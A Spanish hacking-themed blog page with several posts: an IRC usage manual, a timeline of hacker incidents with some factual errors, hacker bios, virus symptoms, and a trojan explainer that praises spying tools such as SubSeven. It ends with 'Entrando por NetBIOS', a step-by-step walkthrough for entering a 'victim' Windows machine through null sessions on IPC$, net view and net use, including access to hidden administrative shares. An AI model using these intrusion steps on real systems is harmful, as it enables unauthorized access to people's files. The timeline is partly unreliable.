Manual de IRC By HacKDarK

2

Posted by W4rning | Posted in | Posted on 21:57

Parte 1
Registrando un nick
Para registrar un Nick, este debe cumplir dos características: No estar siendo usado en ese instante y no estar registrado. Para comprobar si esto o no en uso, solo sigan este comando:

/msg nickserv info Nick

Ejemplo: /msg nickserv info nickdeluser

Ahora pasamos a ver si esta en uso en ese momento (aunque no este registrado) de la siguiente manera

/whois nickdekuser

Ok, si no esta y tenemos paso libre pasamos a registrarlo, primero debemos tenerlo en uso, ejecutamos:

/Nick nickdeluser *con este nos cambia el nick.

Ahora si, a registrarlo, usamos el siguiente comando:

/msg nickserv register clave email

Ejemplo: /msg Nickserv register contraseña mimsn@maildejemplo.com

Identificandonos ante Nickserv
/msg nickserv identify Contraseña o simplemente /identify Contraseña Ejemplo: /msg nickserv identify contraseña

Nota: No todos los servidores aceptan /identify y no estoy al tanto de si freenode lo hace... (no probe)

Cambiando nuestro nick
Simplemente escribimos /nick nicknuevo

Nota: no es permanente, es solo mientras estamos.

Cambiando contraseña del nick
Muchs razones podemos tener para cambiar nuestra contraseña: Quizás no la encontramos segura, por error la lanzamos en algún canal o insolitamente (pero ha pasado) la ponemos en nuestro fullname. Cualquiera sea el caso, para cambiar la contraseña, con tu Nick puesto e identificado escribes el siguiente comando:

/msg Nickserv set password nuevaclave Hay que señalar que la palabra password es parte de este comando y no debe ser reemplazada

Puede pasarles que se les caiga la conexion o el propio servidor de problemas y nuestros nick se quedan, asi que volvemos pero con un _ en nuestro nombre, ej en mi caso: Hackdark_ en lugar de hackdark.

La solucion? simple: /nickserv ghost (nick) (clave)

Nick es el propio que usan y que esta colgado, y clave la que usaron para registrar el nick.

Parte 2
Info para OPs
Bueno gente, como ya saben el consejo administrara el IRC como OPs, osea, los integrantes del cosejo seran OPs del canal.

Asi que como se que no se manejan mucho con este tema, aca les armo algo para que agarren la mano...

Los permisos de los OPs (flags) es lo que define que puede hacer y que no puede hacer un OP, los OP tienen las Flags que les pongo abajo y les hago una explicacion breve.

Los permisos dados a los OPs seran los siguientes: +v +o +t +r +i +A (los mate, no? abajo en español xd)

+v - pueden usar el comando voice/devoice
+o - pueden usar el comando op/deop
+t - pueden modificar el topic y tambien trabar/destrabarlo
+r - pueden usar el comando /unban para desbanear (nadie hablo nada de banear a nadie)
+A - pueden ver la access list del canal, pero ya que no podran modificarla da igual
Primero hacernos con el OP del canal, para lo que le pediremos a Chanserv que nos de el permiso OP con el siguiente comando:

/msg chanserv OP #ubuntu-uy NUESTRONICK

Si esta bien nos dira algo como "Chanserv da OP a xxxxxxxxx"

Si el comando funciono, ademas, nos pondra un distintivo junto al nick.

Ahora las funciones:

El founder del canal (en este caso yo), junto con los Operadores del canal (ops) (en este caso el consejo) tendrán la facultad de controlar el canal, haciendo cumplir las reglas que se hayan pactado para el mismo, Reglas.

El comando básico es KICK, que puede ser tomado como la segunda medida contra el atacante (la primera medida es la advertencia verbal), el comando es:

/msg Chanserv kick #ubuntu-uy nick razon

Nota: donde dice "Nick" ponemos el nick a kickear, donde dice"razon" ponemos le razon por la que lo hacemos.

Aclaremos algo, no es lo mismo kick que ban, con kick puede volver a entrar, con ban no.

Seteando modos
Los OPs pueden setear modos al canal, existe varios pero no los vamos a usar a todos por 2 razones:

1* Muchos modos no son permitidos por freenode asi que quedan descartados.

2* Otros no son necesarios por el momento, y de serlo se tiene que SABER LO QUE SE HACE o joden el canal (perdon la palabra, pero mas claro imposible)

Modo t

Topic o tópico.

Uso: /mode #canal +/- t

Con este modo activado, solo podrán modificar el tópic los nicks que aparezcan como operadores agregados por el fundador. Yo ya lo active asi que de momento ni se preocupen.

Otro a mi parecer importante es: Modo m (+m es activado -m es desactivado)

El modo m hace que el canal muestre mensajes SOLO de los que tengan VOP activo (ver VOP mas abajo).

Si estamos en una reunion y queremos evitar que alguien salga ablando de otro tema del medio de la nada, un tipo que recien entro y ni idea tiene de que estamos"ocupados" con otro tema, podemos usar este modo. La persona que no tenga VOP activo podra mandar MP a los demas, pero no al la parte publica del canal.

Para activar los modos al canal, solo hagan /mode MODOQUEQUEREMOS

Nota: a mi me funciona, pero si les da error lo comentan en el post y modifico las entradas de comandos.

Como dar vos (VOP) a un user del chat
Una ves activo el modo +m tendremos que dar vos a quienes esten en la reunion para que puedan participar, para esto hacemos asi:

Ej: activamos +m, y recien llega PabloRubianes, no podra decir nada, asi que los OPs que esten le dan VOP.

Escriben /voice pablorubianes el canal les dira: (ejemplo haciendolo yo) hackdark da voz a pablorubianes

Asi con quienes lo necesiten, nada mas, luego quitan modo +m y a los users quitan voz, haciendo /devoice NICKDELUSER

Parte 3
Mensajes a desconectados
Muchas veces queremos preguntar algo a alguien del IRC (sea el canal que sea) y nos encontramos con que no esta conectado.

Explicacion

Los mensajes enviados con Memoserv (en adelante, memos) permiten enviar mensajes a nicks que no estan conectados al momento que le envían el memo (ojo, si esta conectado tambien lo manda). Claro que para poder enviar y recibir DEBEN TENER NICKS REGISTRADOS.

/Memoserv send nick mensaje

Por ejemplo: /Memoserv send hackdark Dejate de tutos raros...

Manejando los memos
Cuando reciban un memo, les dice (en mi caso):

-MemoServ- You have a new memo from hackdark (1).

-MemoServ- To read it, type /msg MemoServ READ 1

El comando que se usa para leer el memo con el número 1 es:

/Memoserv read número

Lista completa de sus memos
Si quieren ver la lista completa de sus memos usen:

/Memoserv list

Borrando memos
Si ya abrieron un memo, y no quieren tenerlo guardado, usen DEL:

/Memoserv del número del memo

Si quieren borrar todos sus memos usen:

/Memoserv del all

Opciones adicionales
Existe un comando que da mas info sobre los memos:

/Memoserv info

Muestra el número de memos que tienen, el límite de memos, y la manera en que notifica.

un LInk interesante | http://www.mixmarketing-online.com/canal/curso-irc.html

Historia de Incidentes Provocados Por Hackers

0

Posted by Star | Posted in | Posted on 18:20

* Diciembre de 1947 - William Shockley inventa el transistor y demuestra su uso por primera vez. El primer transistor consistía de una colección desordenada de cables, aislantes y germanio. Según datos recientes publicados en el sitio web desitio web de CNN, se cree que el transistor fue el descubrimiento más importante en los últimos 100 años.
* 1964 - Thomas Kurtz y John Kemeny crean BASIC, uno de los lenguajes de programación más populares hasta hoy.
* 1965 -Se estima que aproximadamente 20.000 sistemas de ordenadores se usan en Estados Unidos. La mayoría de éstos son fabricados por International Business Machines (IBM). (IBM).
* 1968 - se funda Intel.
* 1969 - se funda AMD.
* 1969 - Advanced Research Projects Agency (ARPA) crea ARPANET, la red precursora de Internet. Las primeras cuatro redes de ARPANET pertenecían a la Universidad de California Los Angeles, Universidad de California Santa Barbara, la Universidad de Utah y el Instituto de Investigación Stanford
* 1969 - Intel anuncia módulos RAM de 1K (1024 bytes).
* 1969 - Ken Thompson y Dennis Ritchies comienzan a trabajar en UNICS. Thompson escribe la primera version de UNICS en un mes en un artefacto con 4KB de 18 bit words. UNICS después cambió de nombre a 'UNIX'.
* 1969 - MIT se convierte el hogar de los primeros hackers de ordenadores, quienes comienzan a alterar el software y hardware para hacer que funcionen mejor o más rápido.
* 1969 - Linus Torvalds nace en Helsinki.
* 1970 - DEC presenta el PDP-11, uno de los diseños de ordenadores más populares. Algunos se siguen usando hoy en día.
* 1971 - John Draper, alias 'Cap'n Crunch' hackea sistemas de teléfono utilizando un silbato de juguete.
* 1971 - Se presenta el primer programa de correo electrónico para Arpanet. El autor es Ray Tomlinson, quien decide usar el signo '@' para separar el nombre del usuario del nombre de dominio.
* 1972 - Ritchie y Kerningham reescriben UNIX en C, un lenguaje de programación diseñado con la idea de ser ejecutable en diferentes plataformas.
* 1972 - NCSA desarrolla la herramienta 'telnet'.
* 1973 - Gordon Moore, presidente de Intel postula la famosa 'Moore Law', ley Moore que indica el número de transistores en los CPU se duplicarán cada 18 meses, una ha resultado cierta durante más de 20 años.
* 1973 - Se introduce FTP, el protocolo de transmisión de ardchivos.
* 1974 - Stephen Bourne desarrolla el primer importante shell para UNIX, llamado 'bourne'.
* 1975 - Bill Gates y Paul Allen fundan Microsoft. Microsoft.
* 1976 - Bill Gates, entonces de 21 años, escribe una 'An Open Letter to Hobbyists' una carta abierta a los aficionados, un documento en el que condena la fuente abierta y la piratería de software.
* April 1st, 1976 - Se funda Apple Computers.
* 1977 - Billy Joy crea BSD, otro sistema de operación parecido a UNIX. .
* 1979 - Microsoft compra a AT&T la licencia del código fuente de UNIX y crea su propia implementación ‘Xenix’.
* 1981 - Se crea el sistema de nombres de dominio (DNS).
* 1981 - Microsoft adquiere los derechos de propiedad intelectual del sistema operativo DOS y le cambia el nombre a MS-DOS.
* 1982 - Se funda Sun Microsystems. Sun se volvería famoso por su microprocesador SPARC, el sistema operativo Solaris, el sistema de archivo de redes (NFS) y Java.
* 1982 - Richard Stallman comienza a desarrollar una versión libre de UNIX la que llama 'GNU', una definición recursiva que significa 'GNU's no UNIX'.
* 1982 - William Gibson inventa el término 'cyberspace', ciberespacio.
* 1982 - Se publica el SMTP, el 'simple mail transfer protocol' protocolo de transferencia de correo simple. SMTP es actualmente el método más difundido para intercambiar mensajes por Internet.
* 1982 - Scott Fahlman inventa el primer emoticon ‘:)’.
* 1983 - Se funda Internet al dividir el Arpanet en redes separadas: militares y civiles.
* 1983 - Tom Jennings desarrolla FidoNet , que llegará a ser la red de intercambio de información más difundida en el mundo por los próximos 10 años, hasta que el Internet lo sobrepasa.
* 1983 - Kevin Poulsen, alias 'Dark Dante' es arrestado por forzar el Arpanet.
* 1984 - Se funda CISCO Systems.
* 1984 - Fred Cohen crea el primer virus para PC y surge un nuevo término : 'computer virus', virus de ordenadores.
* 1984 - Andrew Tannenbaum crea Minix, un clon gratuito de UNIX basado en la arquitectura modular microkernel.
* 1984 - Bill Landreth, conocido como 'The Cracker', es apresado por hackear sistemas de ordenadores e ingresar a los datos de ordenadores de la NASA y el Departamento de Defensa.
* 1984 - Apple presenta Macintosh System 1.0.
* 1985 - Richard Stallman funda la Fundación de Software Libre (Free Software Foundation).
* March 15, 1985 - Se registra 'Symbolics.com' como el primer nombre de dominio de Internet.
* November 1985 - Microsoft presenta 'Windows 1.0', que se vende a un precio de 100 dólares.
* 1986 - En Estados Unidos se promulga el Acto de Abuso y Fraude en los Ordenadores.
* 1986 - Loyd Blankenship, miembro del grupo 'Legion of Doom', alias 'The Mentor', es arrestado y publica el ahora famoso 'Hacker's Manifesto'.
* 1988 - Se inventa el CD-ROM.
* 1988 - Se establece el IRC.
* Noviembre de 1988 - Robert Morris crea un gusano de Internet que infecta varios miles de sistemas, destroza y provoca atascos en los ordenadores en todo el país, debido a un error de programación. Este virus ahora se conoce como el gusano Morris.
* 1989 - Se desarrolla el WWW en los laboratorios CERN labs, en Suiza
* 1990 - Se desmantela Arpanet.
* 1990 - Kevin Poulsen hackea un sistema telefónico en Los Angeles, haciéndose ganador de un Porsche 944 en un concurso radial.
* 1991 - PGP (Pretty Good Privacy), una poderosa herramienta y gratuita de cifrado es presentada por Philip Zimmerman. El software rápidamente llega a ser el paquete de cifrado más popular del mundo.
* 1991 - Aparecen los rumores sobre el virus de ordenadores 'Michaelangelo', codificado para lanzar su carga destructiva el 6 de marzo.
* 17 de septiembre de 1991 - Linus Torvalds presenta la primera versión de Linux.
* 1992 - El grupo de "phreaking telefónico" “Masters of Deception” es arrestado debido a evidencia obtenida vía pinchado de teléfono.
* 1993 - Se presenta el navegador web Mosaic.
* 1993 - Microsoft presenta Windows NT.
* 1993 - Se presenta la primera versión de FreeBSD.
* 23 de marzo de 1994 - Richard Pryce, de 16 años, alias 'Datastream Cowboy', es arrestado con cargos de acceso no autorizado a ordenadores.
* 1994 - Vladimir Levin, un matemático ruso, hackea el Citibank y roba $10 millones.
* 1995 - Dan Farmer y Wietse Venema presentan SATAN, un escaner automático de vulnerabilidades, que se convierte en una popular herramienta de hacking.
* 1995 - Chris Lamprecht, alias 'Minor Threat', es la primera persona que en ser "baneada" de Internet.
* 1995 - Sun lanza Java, un lenguaje de programación de ordenadores diseñado para ser ejecutado en diferentes plataformas de forma compilada.
* Agosto de 1995 - Microsoft lanza Internet Explorer (IE) el cual se convertirá en el navegador web más explotado de la historia y el blanco favorito para los escritores de virus y hackers.
* August 1995 - Se lanza Windows 95 .
* 1996 - IBM presenta la version 4 de Warp OS/2, un poderoso sistema de operación multitareas con un nuevo interfaz de usuario, como un respuesta a Microsoft, que había presentado Windows 1995. A pesar de ser más confiable y estable, OS/2 irá perdiendo terreno y será abandonado pocos años más tarde.
* 1996 - Se presenta el primer servicio de mensajería en Internet, el ICQ.
* 1996 - Tim Lloyd planta una bomba de tiempo de software en Omega Engineering, una compañía en New Jersey. Los resultados del ataque son devastadores: pérdidas de USD$12 millones y más de 80 empleados que pierden su trabajo. Lloyd es sentenciado a 41 meses en prisión.
* 1997 - Se publican las especificaciones de formato del DVD.
* 1998 -Dos hackers chinos, Hao Jinglong y Hao Jingwen (mellizos) son sentenciados a muerte por una corte en China por ingresar a un ordenador de un banco y robar 720.000 yuan ($87'000).
* March 18, 1998 - Ehud Tenebaum, un prolífico hacker, alias “El Analizador” es arrestado en Israel por hackear muchos ordenadores de alto perfil en los Estados Unidos.
* 1998 - El virus CIH es presentado. CIH es el primer virus que incluye una carga explosiva que borra la memoria FLASH BIOS, haciendo que el sistema del ordenador no pueda arrancar y echa por tierra el mito de que ‘los virus no pueden dañar el hardware’.
* 26 de marzo de 1999 - Se lanza el virusMelissa .
* 2000 - Un hacker adolescente canadiense conocido como ‘Mafiaboy’ conduce un ataque DoS y hace que Yahoo, eBay, Amazon.com, CNN y unos cuantos otros sitios web se tornen inaccesibles. Es sentenciado a ocho meses en un centro de detención para jóvenes.
* 2000 - Microsoft Corporation admite que su red de ordenadores fue penetrada y el código de varias versiones nuevas de Windows fueron robadas.
* 2000 - The FBI arresta a dos hackers rusos, Alexi V. Ivanov y Vasiliv Groshkov. Los arrestos se llevan a cabo después de una operación compleja que incluyó el llevar a los hackers a los Estados Unidos bajo el pretexto de "mostrar sus habilidades de hacking’
* Julio de 2001 - El gusano CodeRed es lanzado, y se esparce rápidamente por todo el mundo, infectando cientos de miles de ordenadores en pocas horas.
* 2001 - Microsoft presenta Windows XP.
* July 18th, 2002 - Bill Gates anuncia la iniciativa 'Trustworthy Computing', una nueva tendencia en el software Microsoft que desarrolla una estrategia dirigida a incrementar la seguridad.
* October 2002 - Hackers no identificados atacan 13 servidores del dominio raíz de Internet. El objetivo: detener el servicio de resolución de nombres de dominio en toda la red.
* 2003 - Microsoft presenta Windows Server 2003.
* 29 de abril de 2003 - New Scotland Yard arresta a Lynn Htun en la feria de ordenadores London's InfoSecurity Europe 2003. Se cree que Lynn Htun obtuvo acceso no autorizado a muchos importantes sistemas de ordenadores como Symantec y SecurityFocus.
* 6 de noviembre de 2003 - Microsoft anuncia un fondo de recompensa de 5 millones de dólares. El dinero se dará a aquellos que ayuden a seguir las pistas de los hackers que tienen como blanco las aplicaciones de software de Microsoft.
* May 7th, 2004 - Sven Jaschan, el autor de los gusanos de Internet Netsky y Sasser, es arrestado en Alemania Occidental.
* September 2004 - IBM presenta un superordenador que es el artefacto más rápido en el mundo. Su velocidad sostenida es de 36 billones de operaciones por segundo

Los Hackers Más Destacados.

0

Posted by Star | Posted in | Posted on 18:18

Esta sección contiene una breve información sobre algunos de los hackers más famosos, ya sean de "sombrero blanco" (inofensivos) o de "sombrero negro" (delincuentes).

Los individuos abajo mencionados son bien conocidos por varias razones: sus acciones, buenas o malas, sus contribuciones al desarrollo de software y la tecnología o su actitud innovadora; sus destrezas y su capacidad de pensar fuera de esquemas preestablecidos.

Richard Stallman es conocido como el padre de software gratuito. Cuando Stallman comenzó a trabajar en el MIT's Artificial Intelligence Lab en1971 fue confrontado con ‘acuerdos de no revelación’ y fuentes de programas cerrados mientras trataba de sintonizar y mejorando los drivers de sistemas de la ‘forma tradicional’.

Después de una interesante batalla para obtener el código fuente de una utilidad de impresión mal escrita, Stallman renunció a su trabajo y se convirtió en el promotor más conocido del software libre, creando GNU y la Fundación de Software Libre .

Dennis Ritchie y Ken Thompson por haber creado el software más significativo del siglo XX: el sistema de operación UNIX y el lenguaje de programación C. Ambos comenzaron sus carreras en los Laboratorios Bell en 1960, revolucionando el mundo de los ordenadores con sus ideas. Mientras Ken Thompson se ha retirado del mundo de los ordenadores, Dennos Ritchie está aún empleado en Lucent Technology, trabajando en un nuevo sistema de operación derivado del UNIX llamado ‘Plan9’

John Draper, alias ‘Cap’n Crunch’ se hizo famoso por su capacidad de hackear los sistemas de teléfonos utilizando solamente un silbato de las cajas de cereales 'Cap'n Crunch' (de aquí viene el sobrenombre). Además de ser el padre del 'phone phreaking', John Draper es también famoso por escribir lo que tal vez fuera el primer procesador de palabras para IBM PC. Ahora tiene su propia empresa de seguridad, desarrollando soluciones antispam, desbaratando los ataques de hackers y asegurando los PC.

Robert Morris es famoso por ser el creador del primer gusano de Internet en 1988, que infectó miles de sistemas y prácticamente paralizó Internet por casi un día. El gusano Morris fue tal vez la primera herramienta hacking completamente automática que utilizó un par de vulnerabilidades no parchadas en los ordenadores Vax y Sun

Kevin Mitnick, posiblemente el hacker de "sombrero negro", fue capturado por el experto en ordenadores Tsutomu Shimomura en 1995.

Kevin Poulsen llegó a la fama por haber hackeado en 1990 el sistema de teléfonos de Los Angeles. Esto le permitió hacer la llamada número 102 en una radio y ganar un Porsche 944. Kevin Poulsen fue capturado y puesto en prisión por tres años. El ahora trabaja como columnista para la revista de seguridad en línea ‘Security Focus’

Vladimir Levin, un experto en ordenadores ruso, hackeó el Citibank y extrajo 10 millones de dólares. Fue arrestado por la INTERPOL en el Reino Unido por el año 1995, y sentenciado a tres años de prisión. También se requirió que pagara la suma de 240.015 dólares en calidad de restitución.

Tsutomu Shimomura es un buen ejemplo de ‘sombrero blanco’. Trabajaba para el Centro de Supercomputación en San Diego cuando Kevin Mitnick se introdujo en su red y robó información de tecnología celular y otros datos secretos. Tsutomu comenzó la persecución que condujo al arresto de Mitnick.

Linus Torvalds es conocido como el padre de Linux, el más popular sistema operativo basado en Unix. Linus comenzó a crear un nuevo sistema operativo en 1991, adoptando varias tecnologías controversiales en su proyecto conocido como Free Software y GNU's Public License System. Es también conocido por su anterior disputa con Andrew Tannenbaum, el autor de Minix, que fue la fuente de inspiración para el proyecto del sistema operativo de Linus.

Sintomas De Virus en la PC.

0

Posted by Star | Posted in | Posted on 17:59

Es difícil adivinar a simple vista si un ordenador está infectado por virus. La certeza sólo se consigue usando un buen antivirus actualizado.

Sin embargo, hay ciertos síntomas que delatan la posible presencia de virus en el ordenador (aunque también pueden deberse a otros problemas ajenos a los virus):

La lentitud no habitual con la que repentinamente funciona un ordenador, sin ninguna causa aparente, puede deberse a varios motivos: muchos programas trabajando al mismo tiempo o problemas de red, pero también a una infección vírica.
Una de las razones de la imposibilidad de abrir ciertos ficheros o de trabajar con determinados programas es que un virus los haya eliminado, o que haya suprimido los ficheros que éste necesita para funcionar.
La desaparición de ficheros y carpetas es uno de los efectos más comunes de los virus.

En ocasiones, puede ser imposible acceder al contenido de ciertos ficheros. Los virus también suelen modificar ficheros, dejándolos inservibles. Al abrirlos, se mostrará un aviso de error.

La aparición en pantalla de avisos o mensajes de texto inesperados puede ser un síntoma claro de infección por virus. Generalmente, estos avisos contienen textos que no son habituales (de carácter absurdo, jocoso, hiriente, agresivo, etc.).

La disminución repentina del espacio en disco o de la capacidad de la memoria es también un síntoma de infección por virus, que puede llegar a ocupar todo el espacio libre. En tal caso se muestran avisos indicando que no hay más espacio.

Algunos virus impiden trabajar correctamente con los discos, haciendo muy difícil guardar un fichero o utilizar el disco con normalidad.
La alteración inesperada en las propiedades de un fichero es también un síntoma de infección. Algunos virus modifican los ficheros que infectan, aumentando su tamaño, alterando su fecha de creación y modificación o sus atributos, etc.

Si el sistema operativo muestra mensajes de error, puede ser debido a un error real o a la presencia de virus. Si estos mensajes aparecen al realizar operaciones sencillas en condiciones normales, hay que sospechar.
Si aparece un fichero duplicado, y uno de ellos tiene extensión EXE, y otro el mismo nombre, pero extensión COM, es muy probable que el segundo de ellos esté infectado.

En caso de producirse un cambio inesperado del nombre de un fichero, es también un síntoma de infección.
Los problemas al arrancar el ordenador pueden deberse a varios motivos, pero la infección por parte de un virus de boot es uno de los más frecuentes.
El ordenador se bloquea (se queda colgado) en momentos de carga excesiva, pero también puede bloquearse por la acción de un virus. Esto es especialmente claro cuando se están realizando operaciones sencillas que no suponen demasiado trabajo para el ordenador.

El ordenador se apaga repentinamente sin motivo aparente y vuelve a arrancar. Algunos virus necesitan que esto suceda para activarse y asegurar su funcionamiento, por lo que provocan este tipo de situaciones.
Si un programa se cierra repentinamente mientras estamos trabajando con él, tendremos motivos para sospechar de una infección.

Otros efectos extraños, claros síntomas de la infección por troyanos, son que la bandeja del CD-ROM se abre y se cierra automáticamente, el teclado y el ratón no funcionan correctamente o lo hacen al azar, desaparecen ventanas y aparecen otras nuevas, etc.

¿ Que es un Trojano ?

0

Posted by Star | Posted in | Posted on 17:52

Un troyano es un aplicación "disfrazada" de un programa útil, consta de dos programas, el Servidor y el Cliente

El "Servidor" es el que se encarga de abrir un puerto en la PC a la que se quiere tener acceso y deja el puerto a la escucha, es decir esperar a que se realice una conexión al puerto para dar el acceso a la máquina.

Por su parte, el "Cliente", es el programa que se conecta al puerto que el Servidor dejó abierto, solicita que se realice la conexión y después comienza a transmitir información, pidiendo datos de la PC remota, tales como Información del sistema, contraseñas, archivos importantes, etc.

¿Cómo se utilizan?.- Se pueden utilizar de dos formas completamente distintas:

Como herramienta de administración remota: que permite manipular el sistema a distancia, ideal para personas que necesitan urgente un archivo de la PC de su oficina y se encuentran en su casa. Se puede considerar como tal solo cuando el usuario tenga el acceso permitido a esa PC.
Como herramienta para hackear: (Hackear: penetrar un sistema informático sin acceso) esta es la forma de utilización que prefiere cualquier persona con una conexión a Internet y ganas de espiar lo que hace otra persona conectada a Internet o a su Red privada, también llamada LAN (Local Area Network o Red de Area Local). Pudiendo acceder a sus archivos confidenciales, contraseñas, recursos compartidos, conversaciones que toman lugar en tiempo real, o borrar archivos fundamentales tales como por ejemplo: COMMAND.COM (dejando a la PC "víctima" sin poder arrancar, a menos que el usuario "atacado" sepa iniciar desde un disco de rescate o de inicio.
Los puertos que se dejan a la escucha generalmente son altos, es decir puertos que pasan del número 500 o el 1000, para garantizar que ningún otro programa pueda estar usándolos y cancelar la conexión del troyano.

El uso de estos programas no es ilegal a menos que el usuario final opte por entrar a la máquina remota sin autorización. En dicho caso se puede proceder legalmente de acuerdo al país en el que se encuentre la PC "hackeada" , es decir la computadora a la que se infiltró el hacker. (hacker: persona interesada en el funcionamiento y vulnerabilidad de los sistemas operativos, lenguajes de programación y seguridad informática). Por ejemplo en EEUU se puede condenar a una larga sentencia por hacer eso, pero también hay que conocer la otra cara de la moneda, es el caso de Argentina, todavía no tiene tipificado en el código penal la intrusión en computadoras sin autorización, esto quiere decir que no es un delito condenable.

Ejemplos de troyanos.- A continuación se enumeran una lista de los troyanos más conocidos del Underground, es decir de la sociedad hacker, o más bien todo aquello que sea difícil de encontrar para el usuario común. La palabra UnderGround significa debajo de la tierra, lo que para la mayoría significa algo oculto y qué otro ejemplo más conciso que los programas que usa un hacker. Cabe aclarar que el uso de estos programas comunmente denominados "para hackers" no convierte a nadie pero absolutamente nadie en "hacker". El hacker no se hace de la noche a la mañana, es más, el hacker no se hace, nace...

NetBus: este "troyano" o "herramienta de administración remota" fue uno de los más difundidos en Internet, ganó un gran número de usuarios adictos al programa por su sencillez de uso y la rapidez del mismo. El tamaño del servidor (el encargado de permitir el acceso a la máquina con o sin autorización) ahora parece grande en comparación con los troyanos nuevos. Tamaño del servidor: 495 KB aproximadamente.

Back Oriffice 2000: sin lugar a duda el troyano que más pánico causó en los últimos tiempos. Fue el preferido de todos por ser el primero que salió en Internet con una facilidad de uso impresionante y características que otros troyanos aun no imaginaban, como la renovada parte gráfica. En la última versión del programa se puede notar que fue programado para funciones de administración remota, ya que se nota la programación estructurada y concisa, sin botones de más, ni funciones innecesarias para el usuario final, la mejor versión hasta el momento.

SubSeven: otro troyano que causó un gran impacto, probablemente el más usado en la actualidad, ya que el programa servidor ocupa menos aun que el servidor del NetBus o el Back Oriffice. La parte gráfica es distinta a las demás, la complementan un gran juego de "skins" (texturas, colores, etc.) y mejor facilidad de uso, además incluye nuevas funciones como la desconexión de Internet del equipo remoto, el cuelgue del modem, el cambio de resolución de la pantalla, lista de los passwords que se encuentran en el cache (las contraseñas que el usuario escribió recientemente), y los passwords de la conexión telefónica a redes, es decir la contraseña de internet. Tamaño del servidor: 327 KB

Cybersensor: este troyano esta programado especialmente para funcionar bajo WindowsNT. No es tan conocido como los anteriores. Tamaño del servidor: 29.5 KB

DeepThroat v2: este programa también es bastante conocido, incluye muchas funciones muy parecidas al resto de los troyanos, como la de adquirir las contraseñas en el chache de la PC remota y las típicas funciones del resto. Tamaño del servidor: 304 KB

Dolly Trojan: excelente troyano, lástima que no se ganó el aprecio del público porque el servidor es muy grande. Evidentemente el programador no tenía la experiencia necesaria.

Girlfriend 1.35: al contrario del Dolly Troyan este programa es muy pequeño, al igual que su servidor, por lo tanto no incluye tantas funciones.

InCommand v1.0: diferente a todos los demás este programa es de tamaño medio, pero lamentablemente no pudo adquirir la atención del usuario porque no tiene suficientes funciones. Tamaño del servidor: 168 KB

NetSphere: nuevamente, al igual que el Dolly este troyano posee un servidor muy grande por lo que se hace pesado el envío por Internet o por e-mail, lo que lleva a la gente a buscar algo menos pesado para enviar, recurriendo a otro troyano. Tamaño del servidor: 621 KB

Master Angel 97: este troyano es uno de los menos conocidos, pero no deja de ser muy bueno.

Fuente: http://www.mailxmail.com/curso-como-programar-aplicaciones-cliente-servidor-visual-basic/troyanos

ENTRANDO POR NETBIOS

0

Posted by Star | Posted in | Posted on 17:37

Lo que se explica a continuación se puede utilizar desde un windows para atacar otro windows, aunque el ataque está pesado para NT sería muy similar si quisiéramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en día existen maneras mas fáciles y rápidas de hacerlo, esta sección la he puesto sólo como curiosidad.

Una vez elegida la máquina a la que quieres entrar solo necesitas el Ms-Dos, o el Símbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:


nbtstat -A 192.168.0.1


(si lo que conoces es
la IP de la victima)

nbtstat -a nombre_del_PC


(si conoces solo su nombre)


pueden ocurrir varias cosas, si recibes:


C:\WINDOWS>nbtstat -A 192.168.0.1


Host not found.


Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)


Si la respuesta es:


C:\WINDOWS>nbtstat -A 192.168.0.1


NetBIOS Remote Machine Name Table


Name Type Status


--------------------------------------------------------------


NAME <00> UNIQUE Registered


WORKGROUP <00> GROUP Registered


NAME <03> UNIQUE Registered


MAC Address = 00-00-00-00-00-00


Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.


Si recibimos:


C:\WINDOWS>nbtstat -A 192.168.0.1


NetBIOS Remote Machine Name Table


Name Type Status


----------------------------------------------------------------


NAME <00> UNIQUE Registered


WORKGROUP <00> GROUP Registered


NAME <03> UNIQUE Registered


NAME <20> UNIQUE Registered


WORKGROUP <1e> GROUP Registered


MAC Address = 00-00-00-00-00-00


En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.


El IPC$ (Inter-Process Communication) es un recurso compartido oculto estándar en una máquina NT , y es utilizado por el servidor para establecer comunicación con otros equipos.


Conectándose al IPC$ un intruso puede establecer una comunicación valida con el servidor NT. Conectándose como null, el intruso puede establecer dicha comunicación sin necesidad de introducir user:password.


Para ello se utiliza el siguiente comando:


c:\>net use \\[ip_de_la_víctima]\ipc$ "" /user:""


The command completed successfully.


Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET


C:\>net view \\192.168.0.1


recibirás algo así:


Shared resources at 192.168.0.1


Share name Type Used as Comment


----------------------------------------------------


NETLOGON Disk Logon server share


Test Disk


The command completed successfully.


Es posible que ocurra:


C:\>net view \\192.168.0.1


System error 5 has occurred.


Entonces primero tienes que establecer la "null session"


C:\>net use \\192.168.0.1\ipc$ "" /user:""


The command completed successfully.


Ahora el C:\>net view \\192.168.0.1


si funcionará


Para conectar a la carpeta compartida.


The command completed successfully.

Si escribes net use ahora, recibirás algo así:

Status Local Remote Network

-------------------------------------------------------------

OK X: \\123.123.123.123\test Microsoft

OK \\123.123.123.123\test Microsoft

The command completed successfully.

Para acceder directamente al PC solo tienes que:


*escribir en el explórer \\192.168.0.1


*INICIO / EJECUTAR y poner lo mismo \\192.168.0.1


*Botón derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1


*En una ventana de símbolo de sistema escribir:


C:\>net use x: \\192.168.0.1\test


y después


C:\>dir x:


Este ataque solo funcionará si la carpeta compartida no tiene pasword.


Recuerda que un intruso no está limitado a los recursos compartidos que aparecen con el net view.


Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo. Por defecto NT


crea el IPC$ y otro por cada partición (por ejemplo una máquina que tiene C, D, y E tendrá sus correspondientes C$, D$, y E$).


También hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).